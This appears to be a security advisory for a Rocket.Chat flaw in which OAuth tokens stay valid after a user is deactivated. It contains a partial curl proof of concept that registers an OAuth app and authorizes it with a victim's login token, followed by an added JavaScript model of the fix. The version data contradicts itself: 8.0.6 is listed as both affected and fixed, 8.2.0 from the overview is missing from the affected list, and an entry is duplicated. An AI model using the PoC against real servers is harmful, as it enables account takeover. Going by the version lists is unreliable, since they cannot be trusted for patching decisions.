## Vulnerability overview

Rocket.Chat 8.2.0 does not revoke OAuth access tokens and refresh tokens after a user is deactivated. A deactivated user can therefore keep using an existing OAuth access token, and can obtain new access tokens from an existing refresh token.

## Affected versions

Affected versions: 8.4.2, 8.4.4, 8.4.7, 8.5.0, 8.4.2, 8.3.4, 8.2.4, 8.1.5, 8.0.6, <7.13.8, <7.10.12

Fixed versions: 8.0.6, 7.13.8, 7.10.12

## Remediation

Upgrade to a fixed version: 8.0.6, 7.13.8, 7.10.12

## POC code

```bash
# 1. Create an OAuth application as an admin:
APP=$(curl -s -X POST http://localhost:3000/api/v1/oauth-apps.create \
  -H "X-Auth-Token: $ADMIN_TOKEN" \
  -H "X-User-Id: $ADMIN_ID" \
  -H 'Content-Type: application/json' \
  -d '{"name":"poc-app","redirectUri":"http://test.com,http://asd.com","active":true}')
CLIENT_ID=$(jq -r '.application.clientId' <<< "$APP")
CLIENT_SECRET=$(jq -r '.application.clientSecret' <<< "$APP")

# 2. Authorize the app using the victim's existing Rocket.Chat login token and exchange the code for tokens:
AUTH=$(curl -sk -X POST \
  "http://localhost:3000/oauth/authorize?scope=user&response_type=code&response_mode=post_form&state=&client_id=$CLIENT_ID&redirect_uri=http://asd.com&login_hint=$VICTIM_LOGIN_TOKEN")
```
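The fix the advisory calls for, modelled as an added example rather than Rocket.Chat's own code: an in-memory OAuth token store where deactivating a user revokes that user's access and refresh tokens, and where token validation and the refresh grant re-check that the owner is still active. The `TokenStore` and `scenario` names, the `revokeOnDeactivate` switch, the 3600-second access-token lifetime and the counter-based token ids are assumptions; running `scenario(false)` reproduces the behaviour the advisory describes, `scenario(true)` the corrected behaviour.

```javascript
// Added example, not Rocket.Chat's code. revokeOnDeactivate=false reproduces the
// advisory's bug; true applies the fix (revoke on deactivation, re-check owner).
class TokenStore {
  constructor({ revokeOnDeactivate }) {
    this.revokeOnDeactivate = revokeOnDeactivate;
    this.users = new Map();    // userId -> { active }
    this.access = new Map();   // accessToken -> { userId, expiresAt }
    this.refresh = new Map();  // refreshToken -> { userId }
    this.seq = 0;              // placeholder token generator; real code uses a CSPRNG
  }
  addUser(userId) { this.users.set(userId, { active: true }); }
  ownerActive(userId) { return this.users.get(userId)?.active === true; }
  issue(userId, now) {
    const access = `at-${++this.seq}`;
    const refresh = `rt-${++this.seq}`;
    this.access.set(access, { userId, expiresAt: now + 3600 }); // assumed 1h lifetime
    this.refresh.set(refresh, { userId });
    return { access, refresh };
  }
  deactivateUser(userId) {
    this.users.get(userId).active = false;
    if (!this.revokeOnDeactivate) return;  // vulnerable path: tokens are left in place
    for (const [t, rec] of this.access) if (rec.userId === userId) this.access.delete(t);
    for (const [t, rec] of this.refresh) if (rec.userId === userId) this.refresh.delete(t);
  }
  // Returns the owning userId for a usable access token, otherwise null.
  validateAccess(token, now) {
    const rec = this.access.get(token);
    if (!rec || rec.expiresAt <= now) return null;
    if (this.revokeOnDeactivate && !this.ownerActive(rec.userId)) return null;
    return rec.userId;
  }
  // Refresh grant: rotates the refresh token and issues a fresh pair, or null.
  refreshGrant(token, now) {
    const rec = this.refresh.get(token);
    if (!rec) return null;
    if (this.revokeOnDeactivate && !this.ownerActive(rec.userId)) return null;
    this.refresh.delete(token);
    return this.issue(rec.userId, now);
  }
}
// Issue tokens to a user, deactivate the user, then try both token types.
function scenario(revokeOnDeactivate) {
  const store = new TokenStore({ revokeOnDeactivate });
  store.addUser('victim');
  const { access, refresh } = store.issue('victim', 1000);
  store.deactivateUser('victim');
  return {
    accessStillValid: store.validateAccess(access, 1500) !== null,
    refreshStillWorks: store.refreshGrant(refresh, 1500) !== null,
  };
}
```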